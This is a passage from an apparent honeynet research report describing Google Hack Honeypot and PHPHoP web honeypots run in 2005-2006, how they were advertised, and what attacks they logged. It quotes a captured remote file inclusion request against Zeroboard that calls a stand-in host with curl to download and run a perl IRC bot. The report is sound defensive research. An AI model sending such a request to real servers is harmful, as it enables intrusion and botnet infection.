Current Research Methods

There are currently two honeypot technologies to respond to attacks against web applications. These include the "Google Hack" honeypot and PHPHop (PHP Honeypot). For the study of web application attacks, these offer advantages over traditional honeypots due to the fact that their existence is advertised. Typically the honeypots can be found via specific searches in the Google or Yahoo search engines and this leads to a lot of sessions between potential attackers and the honeypots. These are considered low interaction honeypots in that they emulate web applications and/or their vulnerabilities.

We ran five GHH honeypots in one honeynet over the course of about twelve months during 2005 and 2006. Some of these honeypots emulated a web application called PHPShell and some of them emulated the phpBB2 message board application. The PHPShell honeypot emulated PHPShell, by offering the appearance of access to the underlying operating system shell. All commands that the attacker executes are logged, together with details of the HTTP session in progress. If the attacker attempts to download any binaries we obtain a copy of these as well. The phpBB2 honeypots were emulating multiple remote code execution vulnerabilities, including the one exploited by the Santy worm as described above.

Our GHH honeypots were advertised using a technique we call "transparent linking". This involves placing hyperlinks pointing to our honeypot on other web pages so that our honeypots are indexed by search engines. The links are designed so that humans will not see them, so the only visitors to the honeypot should be those who have specifically searched for it using a search engine. For example, we might insert a link such as '.' into a web page which is already being indexed by a search engine. When the engine crawls the site again, it will follow the link and index the honeypot as well. By having the honeypot indexed in a search engine we increase the amount of attacks that traverse our honeynet rather than relying on attackers finding the honeypot by manual scanning. Usually when a web browser visits the honeypot we can see the search criteria revealed by the 'referer' field of the HTTP request. All the traffic to the GHH honeypots was logged and inspected for malicious activity.

Below is a graph of the number of HTTP requests received by the Google Hack Honeypot honeynet during 2006, and includes requests from search engines which are indexing the pages on the honeypot, as well as malicious activity. There is a consistently high number of visits from search engines such as Yahoo, Google and MSN Search and a fairly steady stream of other visitors trying to execute operating system commands on the honeypots.

GHHactivity

Another two PHPHoP honeypots have been running for about 12 months and have been emulating several vulnerable web applications including Advanced Web Statistics (awstats), the Mambo Content Management System and certain applications making use of the PHPXMLRPC protocol. The emulations are relatively basic and are not convincing to a human attacker but do collect a variety of probes and automated exploit attempts, including capturing the files and payloads used in these attempts. When the attacker makes a malicious request to the honeypot, for example, attempting to exploit a remote code-inclusion problem in Zeroboard, a web bulletin board :

GET
//bbs/skin/zero_vote/error.php?dir=http://evil.example.com/cmd2.gif?&cmd=cd%20/tmp;curl%20-O%20http:/evil.example.com/w0w;perl%20w0w

The honeypot will parse the malicious request for commands such as 'curl' and 'wget, which are utilities to download data from the Internet. Any such commands found in the request will cause the data to be downloaded automatically by the honeypot and stored for later analysis. In this case, the file http://evil.example.com/cmd2.gif is a PHP helper script (similar to the c99 shell in Appendix B) which allows the execution of operating system commands. The command to be executed is to download and run a perl program called 'w0w' from the same server. Having obtained the file 'w0w' we ran it manually within a sandboxed environment and observed it join an IRC channel on a public IRC server. Because these are low-interaction honeypots, no danger exists that an attacker can use them to do damage to other systems. All the incidents described are merely attempts to perform actions on these honeypots, for example no phishing sites were actually available for the attackers to use. Similarly, all the uploaded binaries were manually analysed within sandboxes rather than from observing them running on the honeypots.